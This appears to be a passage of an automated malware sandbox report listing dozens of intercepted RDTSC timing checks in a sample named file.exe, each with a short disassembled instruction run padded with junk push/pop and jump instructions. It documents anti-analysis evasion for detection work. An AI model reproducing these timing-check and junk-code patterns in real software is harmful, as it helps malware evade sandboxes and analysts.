                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A83DA second address: 10A83FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B92471h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jng 00007F8114B92466h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A83FD second address: 10A843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BEAh 0x0000000a jmp 00007F8114E11BF6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007F8114E11BF7h 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A843E second address: 10A8443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8579 second address: 10A857D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A857D second address: 10A85A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92477h 0x00000007 jbe 00007F8114B92466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89AA second address: 10A89EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BEDh 0x00000007 jmp 00007F8114E11BF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jo 00007F8114E11BE6h 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F8114E11BE6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89EA second address: 10A89F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B4B second address: 10A8B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F8114E11BFBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B76 second address: 10A8B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8B7B second address: 10A8BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F8114E11BE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8114E11BF2h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8114E11BF7h 0x00000022 jnp 00007F8114E11BE6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8D34 second address: 10A8D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8D39 second address: 10A8D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8114E11BE6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1A9 second address: 10AF1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8114B92472h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1CE second address: 10AF1D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF35F second address: 10AF38E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8114B92466h 0x00000008 jmp 00007F8114B92476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F8114B92466h 0x00000016 js 00007F8114B92466h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF4B1 second address: 10AF4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF61D second address: 10AF621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF621 second address: 10AF631 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF631 second address: 10AF635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8E3 second address: 10AF8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007F8114E11BEAh 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA4E second address: 10AFA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA52 second address: 10AFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8114E11BE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA62 second address: 10AFA7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8114D9D1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8114D9D1FBh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA7D second address: 10AFA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA84 second address: 10AFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FCh 0x00000007 js 00007F8114D9D1FEh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0248 second address: 10B024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B08B4 second address: 10B08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8114D9D200h 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4C59 second address: 10B4C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114DEC06Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B99F9 second address: 10B99FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B99FF second address: 10B9A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8114DEC079h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8114DEC071h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A1E second address: 10B9A23 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A23 second address: 10B9A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F8114DEC07Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9A4A second address: 10B9A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114D9D207h 0x00000009 jmp 00007F8114D9D204h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5804 second address: 10C581C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC06Fh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C581C second address: 10C5822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5822 second address: 10C5833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5833 second address: 10C5860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F8114D9D200h 0x0000000d jmp 00007F8114D9D204h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5860 second address: 10C5865 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C993F second address: 10C995E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C995E second address: 10C9962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0334 second address: 10D0339 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3ED0 second address: 10D3ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3ED4 second address: 10D3EDE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114D9D1F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE65 second address: 10DAE7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC06Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8114DEC066h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE7E second address: 10DAE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE82 second address: 10DAE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAE88 second address: 10DAEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F8114D9D200h 0x0000000d pushad 0x0000000e jp 00007F8114D9D1F6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2746 second address: 10E276B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F8114DEC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8114DEC077h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E276B second address: 10E2771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E28C6 second address: 10E28F0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114DEC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8114DEC074h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 js 00007F8114DEC06Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E527F second address: 10E5289 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114D9D1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E5289 second address: 10E528E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85FA second address: 10E8603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8603 second address: 10E8607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8767 second address: 10E876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E876B second address: 10E8792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F8114DEC079h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104B5E second address: 1104B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104B64 second address: 1104B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CBF second address: 1104CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CC5 second address: 1104CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F8114DEC07Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CD4 second address: 1104CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114D9D200h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114D9D1FEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CF8 second address: 1104CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11139C3 second address: 11139C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11139C9 second address: 11139CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113B54 second address: 1113B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113B5D second address: 1113B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113CC6 second address: 1113CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114126 second address: 1114153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F8114DEC06Ch 0x0000000b pushad 0x0000000c jmp 00007F8114DEC077h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114311 second address: 1114315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114315 second address: 111433A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114DEC074h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111433A second address: 111433E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111433E second address: 1114346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114346 second address: 1114352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F8114D9D1F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111474B second address: 111474F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111736E second address: 1117372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117649 second address: 111764F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111764F second address: 1117663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114D9D1FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117942 second address: 1117946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117946 second address: 111794A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111794A second address: 11179B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8114DEC068h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 or edx, 49ADECD2h 0x00000027 push dword ptr [ebp+122D2C7Ah] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F8114DEC068h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edx, dword ptr [ebp+122D3996h] 0x0000004d push 1DD4FB17h 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007F8114DEC066h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C127 second address: 111C136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C136 second address: 111C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F8114DEC066h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57702F7 second address: 5770381 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8114D9D200h 0x00000008 sub eax, 62B51ED8h 0x0000000e jmp 00007F8114D9D1FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F8114D9D206h 0x0000001d push eax 0x0000001e jmp 00007F8114D9D1FBh 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8114D9D204h 0x0000002b and cl, FFFFFF98h 0x0000002e jmp 00007F8114D9D1FBh 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8114D9D201h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770381 second address: 57703EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8114DEC073h 0x00000013 add ah, 0000006Eh 0x00000016 jmp 00007F8114DEC079h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F8114DEC070h 0x00000022 or eax, 326879E8h 0x00000028 jmp 00007F8114DEC06Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577042F second address: 5770492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8114D9D1FCh 0x00000011 and cl, 00000008h 0x00000014 jmp 00007F8114D9D1FBh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F8114D9D206h 0x00000022 xor cl, 00000068h 0x00000025 jmp 00007F8114D9D1FBh 0x0000002a popfd 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770492 second address: 57704AE instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8114DEC071h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704AE second address: 57704B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704B4 second address: 57704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114DEC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704D4 second address: 57704D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704D8 second address: 57704DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704DE second address: 57704FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114D9D209h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704FB second address: 57704FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57704FF second address: 5770526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F8114D9D1FDh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8114D9D1FDh 0x00000017 rdtsc
